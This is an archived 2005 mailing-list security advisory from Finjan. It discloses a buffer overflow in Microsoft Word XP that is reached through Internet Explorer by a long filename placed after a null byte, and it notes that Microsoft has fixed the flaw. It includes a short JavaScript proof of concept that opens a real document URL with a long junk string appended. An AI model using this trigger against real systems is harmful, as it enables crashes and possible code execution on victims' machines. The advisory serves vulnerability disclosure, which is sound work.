Finjan Security Advisory: Microsoft Office XP Remote Buffer Overflow Vulnerability

• Previous message: CORE Security Technologies Advisories: "CORE-2004-0819: MSN Messenger PNG Image Parsing Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date:         Wed, 9 Feb 2005 02:18:45 +0200
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

Finjan Security Advisory
Microsoft Office XP Remote Buffer Overflow Vulnerability

Introduction

Finjan has discovered a new vulnerability in Microsoft Word
XP that would allow a hacker to launch a buffer overflow attack.
This attack could occur when a user opened a Word document using
Internet Explorer.

Technical Description

When a ".doc" file is opened inside Internet Explorer, Microsoft
Word XP "takes over" and opens that doc file. The problem appears
when sending a doc file request that contains a null byte (parser)
at the end of the doc filename (the rtf extension is also vulnerable).

For example:
http://www.myhost.com/myfile.doc is a valid request.

However This:
http://www.myhost.com/myfile.doc%00aaaaaaaaaaaaaaaaaaaaaaa...aa.doc
is an invalid request. Such a request will be sent to the server
hosting the doc file.

Most servers like IIS and Apache will truncate the characters before
the %00 while sending the filename to Internet Explorer.
At this stage, Internet Explorer will hand over the string to Microsoft
Word XP, which will now receive a long string. This string causes an
exploitable buffer overflow, allowing remote code execution.

The Code (Proof of Concept)

<Script>
var mylongstring,myjunk;
mylongstring ="";
myjunk="bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbb";
for(c=1;c<5000;c++)
{
  mylongstring = mylongstring + myjunk;
}
window.open("http://www.hhs.gov/ocr/privacysummary.rtf%0a"+mylongstring);
</script>

Vulnerability Status

Microsoft was notified on July 13, 2004.
The bug is now fixed. For further details please refer to Microsoft
security bulletin MS05-004.

Credit

Rafel Ivgi, Malicious Code Research Center (MCRC), Finjan Software Ltd.

-----------------------------------------------
This message was scanned for malicious content and viruses by Finjan Internet Vital Security 1Box(tm)

--
NTBugtraq Editor's Note:
Most viruses these days use spoofed email addresses. As such, using an Anti-Virus product which automatically notifies the perceived sender of a message it believes is infected may well cause more harm than good. Someone who did not actually send you a virus may receive the notification and scramble their support staff to find an infection which never existed in the first place. Suggest such notifications be disabled by whomever is responsible for your AV, or at least that the idea is considered.
--

• Previous message: CORE Security Technologies Advisories: "CORE-2004-0819: MSN Messenger PNG Image Parsing Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]